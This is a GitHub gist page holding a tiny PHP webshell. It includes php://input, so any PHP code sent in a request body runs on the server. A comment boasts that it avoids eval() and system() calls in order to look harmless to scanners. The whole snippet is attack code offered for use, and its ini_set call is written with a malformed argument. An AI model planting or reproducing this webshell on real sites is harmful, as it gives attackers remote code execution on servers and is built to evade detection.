Skip to content

Instantly share code, notes, and snippets.

@ahhh
Created October 31, 2015 02:58
Show Gist options
  • Save ahhh/ff8b257f72396c43f4cf to your computer and use it in GitHub Desktop.
Save ahhh/ff8b257f72396c43f4cf to your computer and use it in GitHub Desktop.
A php url include webshell, inspired by: http://insecurety.net/?p=757
<?php
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
// No eval() calls, no system() calls, nothing normally seen as malicious.
include('php://input');
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment